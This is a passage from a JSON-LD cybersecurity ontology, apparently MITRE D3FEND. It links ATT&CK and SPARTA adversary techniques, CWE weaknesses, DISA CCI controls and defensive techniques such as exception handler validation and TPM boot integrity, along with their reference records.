          "@id": "d3f:CCI-002661_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002662_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002684_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002688_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002689_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002690_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002691_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002710_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002711_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002712_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002715_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002716_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002717_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002718_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002723_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002724_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002726_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002729_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002740_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002743_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002746_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002748_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002749_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002771_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002824_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002883_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002890_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002891_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-003014_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-003123_v2022-04-05"
        }
      ],
      "d3f:version": "2022-04-05",
      "rdfs:label": "CCI Catalog v2022-04-05",
      "rdfs:seeAlso": {
        "@id": "https://public.cyber.mil/stigs/cci/"
      }
    },
    {
      "@id": "d3f:T1123",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:AudioInputDevice"
      },
      "d3f:attack-id": "T1123",
      "d3f:definition": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)",
      "rdfs:label": "Audio Capture",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:Ndfea1e131a45420d8abaaef61bdde168"
        }
      ]
    },
    {
      "@id": "_:Ndfea1e131a45420d8abaaef61bdde168",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AudioInputDevice"
      }
    },
    {
      "@id": "d3f:T1052",
      "@type": "owl:Class",
      "d3f:attack-id": "T1052",
      "d3f:definition": "Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.",
      "rdfs:label": "Exfiltration Over Physical Medium",
      "rdfs:subClassOf": {
        "@id": "d3f:ExfiltrationTechnique"
      }
    },
    {
      "@id": "d3f:controls",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x controls y: x directs or regulates y's operational state, behavior, or function.",
      "rdfs:label": "controls",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-EnhancingNetworkSecurityByPreventingUser-InitiatedMalwareExecution_",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://ieeexplore.ieee.org/document/1425209"
      },
      "d3f:kb-abstract": "In this paper, we describe characteristics of the most widely used defense techniques for the blocking of user-initiated malware and why these techniques are insufficient. We then introduce a module verification strategy that will eliminate, or at least severely reduce, this problem by extending the classic \"defense in depth\" network security strategy. We then describe how the augmentation of a standard operating system loader to include references to a database of cryptographic hashes of module executables can be used to implement this strategy. Finally, we describe our efforts towards the creation of a prototype system that implements the module verification strategy.",
      "d3f:kb-author": "John V. Harrison",
      "d3f:kb-mitre-analysis": "This paper describes application whitelisting. New software executable code is compared to a database of allowed software to determine if the new executable code should be loaded and executed. A database of cryptographic hashes is first created for all allowed software executables. Prior to loading any new executable code, a hash is computed and compared against the hash database. If the hash for the new code does not appear in the database, the executable is not loaded and executed.",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ExecutableAllowlisting"
      },
      "d3f:kb-reference-title": "Enhancing Network Security By Preventing User-Initiated Malware Execution",
      "rdfs:label": "Reference - Enhancing Network Security By Preventing User-Initiated Malware Execution - MITRE"
    },
    {
      "@id": "d3f:Reference-LibreNMSDocsOxidizedExtension",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.librenms.org/Extensions/Oxidized/"
      },
      "d3f:kb-abstract": "Integrating LibreNMS with Oxidized brings the following benefits:\n\n* Config viewing: Current, History, and Diffs all under the Configs tab of each device\n* Automatic addition of devices to Oxidized: Including filtering and grouping to ease credential management\n* Configuration searching",
      "d3f:kb-organization": "LibreNMS.org",
      "d3f:kb-reference-of": {
        "@id": "d3f:DiskEncryption"
      },
      "d3f:kb-reference-title": "LibreNMSDocs - Oxidized Extension",
      "rdfs:label": "Reference - Libre NMS - Oxidized Extension"
    },
    {
      "@id": "d3f:Reference-CNNSI-4009",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://rmf.org/wp-content/uploads/2017/10/CNSSI-4009.pdf"
      },
      "d3f:kb-abstract": "[The CNSS Glossary is a jointly curated glossary of terms for National Security Systems by DoD, IC, and Civil Agencies (e.g., NIST)",
      "d3f:kb-organization": "Committee on National Security Systems (CNSS)",
      "d3f:kb-reference-of": {
        "@id": "d3f:PhysicalAccessMediation"
      },
      "d3f:kb-reference-title": "Committee on National Security Systems (CNSS) Glossary",
      "rdfs:label": "Reference - Committee on National Security Systems (CNSS) Glossary"
    },
    {
      "@id": "d3f:ExceptionHandlerPointerValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ExceptionHandlerPointerValidation"
      ],
      "d3f:d3fend-id": "D3-EHPV",
      "d3f:definition": "Validates that a referenced exception handler pointer is a valid exception handler.",
      "d3f:kb-article": "## How It Works\nWhen a process encounters an exception, it calls an exception handler to deal with the exception.  The method by which this exception handler is determined varies by the operating system.  The exception handler is called, even if it is the default exception handler to terminate the program and display a message that the program stopped working.  In the case that no valid exception handler is found, the program would fail to proceed as normal and could be programmed to terminate.\n\nIn Windows, the address of the exception registration record is stored at the very start of the the Thread Information Block; the GS register points to this structure.\n\nThe exception registration record contains two pointers: a pointer to the next exception registration record should this handler fail to handle the exception, and a pointer to the handler.\n\nA buffer overflow can overwrite the saved return pointer with an invalid location to execute memory; this often triggers the exception handler chain, which could also be corrupted by the buffer overflow.  Although Process Exception Handler Validation does not make sure that the exception handler pointer or the code at the exception handler was unaltered, or that the exception handler code is secure, this technique does ensure that the pointer is at least an exception handler that could be called by the program.\n\nWith Process Exception Handler Validation, before the handler is called, it checks the exception handler against a source of valid exception handlers.  If the requested handler is not in this list, other techniques such as those in Process Eviction might be invoked, such as Process Termination to end the current process, or Executable Blacklisting to blacklist the potentially vulnerable or malfunctioning executable.\n\n### Runtime valid exception handler source generation\nThe source of valid exception handlers could be generated at runtime, with the risk of the information that is used to determine the validity of exception handlers being compromised.\n\n### Compile-time\nThe source of valid exception handlers could also be generated at compile time or as a binary patch.  Given the source code, it would be rather straightforward to find the exceptions, as they are pointed in the catch statement of a try-catch clause and the compiler must already generate the code to call exceptions from this.\n\n## Considerations\nIf the program file can be altered by the attacker, then the security could be bypassed by replacing it with any desired program, without even bypassing SEH.\n\nIf the attacker was already able to overwrite the code for a valid exception handler via other functionality in the program, this defense would not prevent arbitrary code execution.\nIf an exception handler recognized as valid is vulnerable, it would be executed anyway.\n\nSafeSEH might be applied only to some executable files or modules, allowing an attacker to call any piece of code as an exception handler in the unprotected modules.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SAFESEH_ImageHasSafeExceptionHandlers_MicrosoftDocs"
      },
      "d3f:synonym": "Exception Handler Validation",
      "d3f:validates": {
        "@id": "d3f:Pointer"
      },
      "rdfs:label": "Exception Handler Pointer Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "_:N074ad4fc4cae48aeb3088ae8f4685431"
        }
      ]
    },
    {
      "@id": "_:N074ad4fc4cae48aeb3088ae8f4685431",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:validates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Pointer"
      }
    },
    {
      "@id": "d3f:TA0036",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Exfiltration - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Exfiltration"
    },
    {
      "@id": "d3f:CWE-469",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-469",
      "d3f:definition": "The product subtracts one pointer from another in order to determine size, but this calculation can be incorrect if the pointers do not exist in the same memory chunk.",
      "rdfs:label": "Use of Pointer Subtraction to Determine Size",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:CCI-001305_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:MessageAuthentication"
        },
        {
          "@id": "d3f:SenderMTAReputationAnalysis"
        },
        {
          "@id": "d3f:SenderReputationAnalysis"
        },
        {
          "@id": "d3f:TransferAgentAuthentication"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs spam protection mechanisms at information system entry and exit points to detect and take action on unsolicited messages transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001305"
    },
    {
      "@id": "d3f:CWE-1046",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1046",
      "d3f:definition": "The product creates an immutable text string using string concatenation operations.",
      "rdfs:label": "Creation of Immutable Text Using String Concatenation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1176"
      }
    },
    {
      "@id": "d3f:OTChangeControlProgramCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a remote device to modify an existing control program.",
      "rdfs:label": "OT Change Control Program Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommandEvent"
        },
        {
          "@id": "_:Nabf6ec5c53684489b40d41d818f69e8e"
        },
        {
          "@id": "_:N27bcb7f72e3842c29f8720fd409f07cb"
        }
      ]
    },
    {
      "@id": "_:Nabf6ec5c53684489b40d41d818f69e8e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTChangeControlProgramCommand"
      }
    },
    {
      "@id": "_:N27bcb7f72e3842c29f8720fd409f07cb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "d3f:CCI-001350_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to protect the integrity of audit information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:FileEncryption"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001350"
    },
    {
      "@id": "d3f:CWE-87",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-87",
      "d3f:definition": "The product does not neutralize or incorrectly neutralizes user-controlled input for alternate script syntax.",
      "rdfs:label": "Improper Neutralization of Alternate XSS Syntax",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-79"
      }
    },
    {
      "@id": "d3f:TPMBootIntegrity",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:TPMBootIntegrity"
      ],
      "d3f:d3fend-id": "D3-TBI",
      "d3f:definition": "Assuring the integrity of a platform by demonstrating that the boot process starts from a trusted combination of hardware and software and continues until the operating system has fully booted and applications are running.  Sometimes called Static Root of Trust Measurement (STRM).",
      "d3f:kb-article": "## How it works\nDuring the boot process, the BIOS boot block (which with this defense enabled, is the Core Root of Trust for Measurement) measures boot components (firmware, ROM). The TPM hashes those measurements and stores the hashes in Platform Configuration Registers (PCRs).  Upon a subsequent boot, these hashes are provided to a verifier which compares the stored measurements to the new boot measurements. Integrity of the boot components is assured if they match.\n\nAttestation of the secure boot occurs when a verifying entity requests a Quote which is a concatenation of the requested PCR values, hashed and signed by the TPM's unique RSA key.  The TPM signature is trusted because the private key is stored securely in hardware and never leaves the TPM.\n\n## Considerations\n\n* The TPM does not perform the follow-on actions of acting on the PCR value information, it just provides the PCR stored information.\n* The current version of TPM is 2.0.; most existing implementations use TPM 1.2.\n\n## Citations\n[1] [TPM 2.0 Library](https://trustedcomputinggroup.org/resource/tpm-library-specification/)\n[2] [TCG Trusted Attestation Protocol (TAP) Use Cases for TPM Families 1.2 and 2.0 and DICE](https://trustedcomputinggroup.org/wp-content/uploads/TCG_TNC_TAP_Use_Cases_v1r0p35_published.pdf)",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-TCGTrustedAttestationProtocolUseCasesForTPMFamilies1.2And2.0AndDICE"
        },
        {
          "@id": "d3f:Reference-TrustedAttestationProtocolUseCases"
        },
        {
          "@id": "d3f:Reference-TPM2.0LibrarySpecification_TrustedComputingGroup,Incorporated"
        }
      ],
      "d3f:synonym": [
        "STRM",
        "Static Root of Trust Measurement"
      ],
      "rdfs:label": "TPM Boot Integrity",
      "rdfs:subClassOf": {
        "@id": "d3f:PlatformHardening"
      }
    },
    {
      "@id": "d3f:AML.T0048.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0048.002",
      "d3f:definition": "Societal harms might generate harmful outcomes that reach either the general public or specific vulnerable groups such as the exposure of children to vulgar content.",
      "rdfs:label": "Societal Harm - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0048.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0048"
      },
      "skos:prefLabel": "Societal Harm"
    },
    {
      "@id": "d3f:CCI-002235_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents non-privileged users from executing privileged functions to include disabling, circumventing, or altering implemented security safeguards/countermeasures.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002235"
    },
    {
      "@id": "d3f:CWE-80",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-80",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as \"<\", \">\", and \"&\" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.",
      "rdfs:label": "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-79"
      }
    },
    {
      "@id": "d3f:T1188",
      "@type": "owl:Class",
      "d3f:attack-id": "T1188",
      "d3f:definition": "To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1090.003",
      "rdfs:label": "Multi-hop Proxy",
      "rdfs:seeAlso": {
        "@id": "d3f:T1090.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:OTCreateNewControlProgramCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a remote device to create an control program.",
      "rdfs:label": "OT Create New Control Program Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommandEvent"
        },
        {
          "@id": "_:Ne5b1a609daa64f2183fb6bd8a358bbf5"
        },
        {
          "@id": "_:N5fae1c63d30f44c59ae69b7830ad28a2"
        }
      ]
    },
    {
      "@id": "_:Ne5b1a609daa64f2183fb6bd8a358bbf5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "_:N5fae1c63d30f44c59ae69b7830ad28a2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTCreateNewControlProgramCommand"
      }
    },
    {
      "@id": "d3f:T1548.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1548.001",
      "d3f:definition": "An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.",
      "d3f:modifies": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "rdfs:label": "Setuid and Setgid",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1548"
        },
        {
          "@id": "_:N1513876904894958b6a293cb4bae4c1b"
        }
      ]
    },
    {
      "@id": "_:N1513876904894958b6a293cb4bae4c1b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "d3f:CWE-309",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-309",
      "d3f:definition": "The use of password systems as the primary means of authentication may be subject to several flaws or shortcomings, each reducing the effectiveness of the mechanism.",
      "rdfs:label": "Use of Password System for Primary Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-654"
        }
      ]
    },
    {
      "@id": "d3f:CodeAnalyzer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Code analyzers automatically analyze the composition or behavior of computer programs regarding a property such as correctness, robustness, security, and safety. Program analysis can be performed without executing the program (static program analysis), during runtime (dynamic program analysis) or in a combination of both.",
      "rdfs:label": "Code Analyzer",
      "rdfs:seeAlso": {
        "@id": "dbr:Program_analysis"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DeveloperApplication"
      },
      "skos:altLabel": "Program Analysis Tool"
    },
    {
      "@id": "d3f:SystemDependency",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system dependency indicates a system has an activity, agent, or another system which relies on it in order to be functional.",
      "rdfs:label": "System Dependency",
      "rdfs:seeAlso": [
        {
          "@id": "https://dl.acm.org/doi/10.1145/960116.53994"
        },
        {
          "@id": "https://r-docs.synapse.org/articles/systemDependencies.html"
        },
        {
          "@id": "https://www.ibm.com/docs/en/taddm/7.3.0?topic=model-dependencies-between-resources"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Dependency"
      }
    },
    {
      "@id": "d3f:M1044",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "D3-SCF is one possible way to filter library loading.",
      "d3f:related": {
        "@id": "d3f:SystemCallFiltering"
      },
      "rdfs:label": "Restrict Library Loading"
    },
    {
      "@id": "d3f:T1213.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1213.004",
      "d3f:definition": "Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.",
      "rdfs:label": "Customer Relationship Management Software",
      "rdfs:subClassOf": {
        "@id": "d3f:T1213"
      }
    },
    {
      "@id": "d3f:TA0101",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Command and Control - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Command and Control"
    },
    {
      "@id": "d3f:Relational-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RBTL",
      "d3f:definition": "Relational-based Transfer Learning is a subfield of machine learning where knowledge and patterns learned from one domain, characterized by relational and structured data, are transferred to enhance the learning of another related domain. This approach leverages shared concepts, relations, and structures across domains, taking advantage of the rich semantic knowledge within relational data to improve learning performance in the target task.",
      "d3f:kb-article": "## References\nV7 Labs. (n.d.). Transfer Learning Guide. [Link](https://www.v7labs.com/blog/transfer-learning-guide#:~:text=Relational%2Dbased%20transfer%20learning%20approaches,domain%20to%20the%20target%20domain).",
      "rdfs:label": "Relational-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HomogenousTransferLearning"
      }
    },
    {
      "@id": "d3f:CWE-233",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-233",
      "d3f:definition": "The product does not properly handle when the expected number of parameters, fields, or arguments is not provided in input, or if those parameters are undefined.",
      "rdfs:label": "Improper Handling of Parameters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-228"
      }
    },
    {
      "@id": "d3f:IA-0005.03",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0005.03",
      "d3f:definition": "In this variant, the attacker employs a capture mechanism (robotic arm, grappling fixture, magnetic or mechanical coupler) to establish physical contact without full docking. Once grappled, covers can be manipulated, temporary umbilicals attached, or exposed test points engaged; if design provisions exist (service ports, checkout connectors, external debug pads), these become direct pathways to device programming interfaces (e.g., JTAG/SWD/UART), mass-storage access, or maintenance command sets. Grappling also enables precise attitude control relative to the target, allowing contact-based sensors to read buses inductively or capacitively, or to inject signals onto harness segments reachable from the exterior. Initial access arises when a maintenance or debug path, normally latent in flight, is electrically or logically completed by the grappled connection, allowing authentication-bypassing actions such as boot-mode strapping, image replacement, or scripted command ingress. The operation demands accurate geometry, approach constraints, and fixture knowledge, but yields a transient, high-privilege bridge tailored for short, decisive actions that leave minimal on-orbit RF signature.",
      "rdfs:label": "Proximity Grappling - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0005/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0005"
      },
      "skos:prefLabel": "Proximity Grappling"
    },
    {
      "@id": "d3f:start",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "start",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-process-object-property"
      }
    },
    {
      "@id": "d3f:SystemCallEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user-space process requests a service or resource from the operating system kernel through a system call interface, enabling controlled interactions with hardware or kernel-level operations.",
      "rdfs:label": "System Call Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:KernelEvent"
        },
        {
          "@id": "_:N6ba41464483c459b906317c8aae49ef4"
        }
      ]
    },
    {
      "@id": "_:N6ba41464483c459b906317c8aae49ef4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:CWE-530",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-530",
      "d3f:definition": "A backup file is stored in a directory or archive that is made accessible to unauthorized actors.",
      "rdfs:label": "Exposure of Backup File to an Unauthorized Control Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:VarianceReduction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-VR",
      "d3f:definition": "Leverages a well-known result from statistical learning and decomposes the model error into a data noise term, a model bias term and a model variance term. As the noise term only depends on the data and the bias is induced by the choice of model, any reduction in the error can only come from the variance term.",
      "d3f:kb-article": "## References\nIntro to Active Learning. inovex Blog.  [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).",
      "rdfs:label": "Variance Reduction",
      "rdfs:subClassOf": {
        "@id": "d3f:ActiveLearning"
      }
    },
    {
      "@id": "d3f:T1610",
      "@type": "owl:Class",
      "d3f:attack-id": "T1610",
      "d3f:definition": "Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)",
      "rdfs:label": "Deploy Container",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:DE-0003.03",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.03",
      "d3f:definition": "By toggling receiver enable states (per-receiver, per-antenna, or per-band), the adversary creates deliberate “quiet windows” in which outside intervention cannot arrive. Turning a command receiver off, or shifting to a configuration that ignores the primary path, allows queued actions or onboard procedures to run without interruption, while operators perceive a transient loss of commandability consistent with geometry or environment. Brief, well-timed toggles can also desynchronize counters and handovers, complicating reconstruction of what occurred.",
      "d3f:modifies": {
        "@id": "d3f:OperatingMode"
      },
      "rdfs:label": "Command Receiver On/Off Mode - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/03/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:Naaacfb42e138489ebcd7190ec7be89ca"
        }
      ],
      "skos:prefLabel": "Command Receiver On/Off Mode"
    },
    {
      "@id": "_:Naaacfb42e138489ebcd7190ec7be89ca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingMode"
      }
    },
    {
      "@id": "d3f:T1484",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1484",
      "d3f:definition": "Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation.",
      "d3f:modifies": {
        "@id": "d3f:GroupPolicy"
      },
      "rdfs:label": "Domain or Tenant Policy Modification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        },
        {
          "@id": "_:N2d2e5ed3b65645549f167c51fa19185e"
        }
      ]
    },
    {
      "@id": "_:N2d2e5ed3b65645549f167c51fa19185e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GroupPolicy"
      }
    },
    {
      "@id": "d3f:next",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "next",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-process-object-property"
      }
    },
    {
      "@id": "d3f:T1550.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1550.001",
      "d3f:definition": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.",
      "d3f:may-produce": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:uses": {
        "@id": "d3f:AccessToken"
      },
      "rdfs:label": "Application Access Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1550"
        },
        {
          "@id": "_:Nb0edd2ea9b184d86a2c920b9b8943e71"
        },
        {
          "@id": "_:Ndcc7d46666f2413981a975cec2f5ab40"
        }
      ]
    },
    {
